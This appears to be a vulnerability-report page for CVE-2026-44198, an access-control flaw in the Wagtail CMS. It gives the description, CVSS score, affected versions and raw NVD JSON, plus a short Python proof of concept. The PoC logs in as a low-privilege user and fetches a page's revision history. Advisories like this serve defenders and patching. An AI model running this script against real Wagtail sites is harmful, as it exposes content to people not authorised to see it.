Security Vulnerability Report
CVE-2026-44198 CVSS 4.3 MEDIUM

CVE-2026-44198

Published: 2026-05-11 16:17:35
Last Modified: 2026-05-12 15:58:42

Description

Wagtail is an open source content management system built on Django. Prior to 7.0.7, 7.3.2, and 7.4, a CMS user without the ability to edit a page could still access the history report for the page, potentially resulting in disclosure of sensitive information. This vulnerability is fixed in 7.0.7, 7.3.2, and 7.4.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:torchbox:wagtail:*:*:*:*:*:*:*:* (versions before 7.0.7) - VULNERABLE
cpe:2.3:a:torchbox:wagtail:*:*:*:*:*:*:*:* (versions from 7.1 up to, but excluding, 7.3.2) - VULNERABLE
Wagtail < 7.0.7
Wagtail < 7.3.2
Wagtail < 7.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target configuration
target_url = "http://target-wagtail-site.com"
login_url = f"{target_url}/admin/login/"
page_history_url = f"{target_url}/admin/pages/5/revisions/"  # Replace 5 with valid page ID

# Low-privilege user credentials
username = "low_priv_user"
password = "password123"

session = requests.Session()

# Step 1: Login to get session cookie
login_payload = {
    "username": username,
    "password": password,
    "csrfmiddlewaretoken": ""  # Need to fetch this first in a real scenario
}
# Note: In a real exploit, you must fetch the CSRF token from the login page first.
response = session.post(login_url, data=login_payload)

if response.status_code == 200:
    print("[+] Login successful")
    # Step 2: Access page history without edit permission
    history_response = session.get(page_history_url)
    if history_response.status_code == 200:
        print("[+] Successfully accessed page history!")
        print("[+] Content snippet:")
        print(history_response.text[:500])  # Print first 500 chars
    else:
        print("[-] Failed to access history")
else:
    print("[-] Login failed")
```

References

https://github.com/wagtail/wagtail/security/advisories/GHSA-c4mr-889m-vgf6 (Vendor Advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-44198",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-11T16:17:35.057",
    "lastModified": "2026-05-12T15:58:41.620",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Wagtail is an open source content management system built on Django. Prior to 7.0.7, 7.3.2, and 7.4, a CMS user without the ability to edit a page could still access the history report for the page, potentially resulting in disclosure of sensitive information. This vulnerability is fixed in 7.0.7, 7.3.2, and 7.4."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-280"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:torchbox:wagtail:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "7.0.7",
                "matchCriteriaId": "AA54A323-7F77-4D1D-9830-BF8FBE4B5B34"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:torchbox:wagtail:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "7.1",
                "versionEndExcluding": "7.3.2",
                "matchCriteriaId": "FED1A6D7-1193-485D-B25F-60FCC20A6D6B"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/wagtail/wagtail/security/advisories/GHSA-c4mr-889m-vgf6",
        "source": "[email protected]",
        "tags": [
          "Vendor Advisory"
        ]
      }
    ]
  }
}
```